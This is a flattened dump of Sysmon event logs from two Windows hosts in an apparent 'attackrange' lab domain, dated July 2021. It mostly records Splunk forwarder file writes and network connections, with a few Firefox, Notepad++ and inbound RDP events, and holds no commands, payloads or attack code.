Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F92CD2ABC152F6FAFB4B1973E5C87AD0,SHA256=AF71BD5C9355CA8EDCD5FF632EF3BE75BC62741806A645511AE8192838E0B25E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:55.212{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57491-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:56.000{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A93D7CF57413A4BA3A70D9EB27CE705,SHA256=1584AB13C07B03014CFE5C413C29A8F58E55FAB062E15D3A675745DFE3ABCD59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:57.665{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9859EEC291CE42FA70B64AD560B61803,SHA256=1535755C35858F3B3A983EABE2ED06E28DEBE7ECB5933D1C1E6CC8ACF48267CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:57.016{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78EF1AF463BF45418FAF7BCDFCE4EA98,SHA256=2DD2FE4DCB4AB72645F072426304350AD6F630AF16019922B41D28A3285CEE6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:57.449{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:58.680{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1D7A9A4D1362DA283FA6EBF3B121CF7,SHA256=37E690ED4AF60E2E0CB686D63FE6245418E34B0B1B7BDAAD11880328D76255F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:58.047{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C6526A9C01E9405901FEA15D0A50266,SHA256=1A27A720D9C2A319CE257130D4223EC8254E4FE46C34DFCE08420767EF0225B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:50.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62002-false10.0.1.12-8000- 354300x80000000000000001055470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.957{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62003-false10.0.1.12-8089- 23542300x80000000000000001055469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:59.695{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A86AE483AD22B255C959B185A47B1C6,SHA256=B4B0D9980DC7B0332D512758DECB3B5D2F17C6B6DD8E59D7A5D8D224BC128175,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:59.047{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=331A326FB47163C363576A57A4F38B2B,SHA256=F7F104AF7B8F10D0585799ABF6DA87D1BE8E6D04C46353C7230E9A7FA4592B9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:00.700{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=332F13F1A1B493054CB934DEB0DE16F5,SHA256=E69E976F7899B68CBDD59E61F32FD377551F4E838F8516E161F51F073EE17B4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:00.063{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79EB9829CF0242074B25C67854FEE0EF,SHA256=9181535969DEBCF8227C604BCF12B0D9F12557B5E1A2225D7CEB268371979627,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:01.701{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7053E9A2D258DFDFB40949766E4FA8A1,SHA256=FB3833B94BFFC7074205E09CB430D30DB8C3B6E3D9B8F73F4007DBC55F437CD0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:00.383{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57492-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:01.063{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E282BCAE40064DC06EB6A9BB6A414B5D,SHA256=2FAC75F715E0ABCD2DD1D08EC9622D9CB6525642E94C4D9149940886D53D5D78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:02.704{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23FEAE0182BE406EC017348EF47B5E70,SHA256=CFB94A2F0B559EB9A2F8DA78D53FE13E00C806CE06191FBB58ABD406BCEBFE85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:02.094{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A27875B710697CBD469FFF08A02AFF86,SHA256=AA75C3473D1BC79E21D961FCCB10C1B0CB8DE308DADACBEB6D2ACB3A59FC6C26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:03.741{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=951817FCDF2BD7BAA32625BA95348F34,SHA256=BB89A246942C1B3E7825B6F3C581844AF682404E22243F8734E8B963CA4D9DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:03.125{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A09DEF49CFA1ACEB6982F1640E15A8F,SHA256=D3C486826EAE66021D1F4D14F7D8D79D8B074A32D1AB427237C0BAB0D63A0348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:04.772{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE36B56FFB0E24DA229B22BA0E749DEC,SHA256=6C49D12DFF475CCB7358C6D7759B7F64854299A321C66E20B1E3886245ABA186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:04.127{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D397FAA4EDC0FF7B60148A4AF9CE709C,SHA256=E7122F82EB5BA6EBB11B81E42EB3049ACD5E364E67C07FAEB6856A90B798A177,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:56.765{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62004-false10.0.1.12-8000- 23542300x80000000000000001055477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:05.776{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7D8AEA00BFC02FF3F57F8F243273E54,SHA256=0896BBCD934B8469C54A075DB95F304A6167ACC911C86546360B96650D1E731F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:05.140{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=450E9325FC2C37C008C3FD3E35BF3649,SHA256=BC1630A07C90BF4601BD9F366BE2166411F2C05EE54F05D590F70C26F1BAA32F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:06.791{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63FD76258C4DCC351416930AF3C5234A,SHA256=23E8EE875836FD4ED3F4428E22C51AC3C91544C647F218D74F0136D413508A63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:06.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23F58AC71B106E6F48B3E57BD0C73707,SHA256=AC27A473B291017D6766613576480DDA8328DBF979CB8D62EDBC1E8B7585DCD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:06.592{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:06.507{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001055480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:06.507{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001055479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:10:06.507{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1219.42868743C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001055478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:10:06.507{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1219.42868743C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001055484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:07.844{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C8213E11CE548C1805AFEC147778F47,SHA256=57C34F7544B38BBD0B16873A418398D064A475D9D26FC2C1B49A6C448D01378B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:06.322{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57493-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:07.189{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE695FC926BB13ED51CB6E9657C4DDEB,SHA256=B39948C573AF4E9BB0526E2BC41943F374C427D1B4360ACAA4CA85A15505B91A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:08.844{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA8E60678E647D0DA32C6BC88DFFE509,SHA256=32D1A02402A5071F07DEB155D0896C3FFF2E886DB96309DBD60FC47F4CD44B9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:08.189{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EC1A4DB4B462F0D6F1C1409E57DE4D8,SHA256=CCE813743E4E1B67041CE7AD03F69E74A9CAABB956A6463AF60C236097601AAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:08.290{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=066580A32C31085B505DA4304D18E6AD,SHA256=8C6E4DECF2968E2642CE7CA0EB0F52F73D29EA6FFAABC5A52C13780469B932A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:09.926{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B446BE4283E65BECFEA297785043789D,SHA256=F3B18154A174BB2AF498BB0D2E7EEB9DE21B52FC4B4F06D0082C6C6EA2946550,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:09.924{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60C5A0FFBFF92773D834F057F489C6B6,SHA256=A51BC88222893DEA9619082FCCB6F6600560F3C3DF5AD978A4522F44E8EF05E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:09.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A42971812D0A6C4AF7119193623BAD0,SHA256=E9834BA35F697020ABA7B7C54D1E316408B8C80818C743172773FB704A56D491,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:09.204{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E70944BC56B7A562109EA0AD755ECD8,SHA256=DF23AB37626A32FC04F8A2C106F9971F09B9B9C81BB64728C57E587FA316D9E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:01.528{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-63687-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001055492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:10.873{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04E35C911FC8BCA38D8ECCA0494E2434,SHA256=F57892238EBCAB7A4E1D85619F4F01517A2E4C3470E7D2CB5CA6ADC34015A98C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:10.236{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA92EE4FD925F751133C0B673DF6389E,SHA256=82BBAAFE559D11491DAB8C58A3AE9AF0A71390EE7E098D8F4320B31CCCF3CCB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:02.646{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62005-false10.0.1.12-8000- 23542300x80000000000000001055493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:11.889{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=830D3B21C83F8F33F683F13D5CDBB482,SHA256=CE12DFFC367FC2EC18FC30FBD7962311E099F92B01938C687BD66B5BFF3118B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:11.236{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E28465A0D6EC52C9A3B28AC45A73AC40,SHA256=82F444FF36181DFA894AC8D3E7F0B19B15441C2703CE06BA8B0C34B3CCBBB9B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:12.904{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
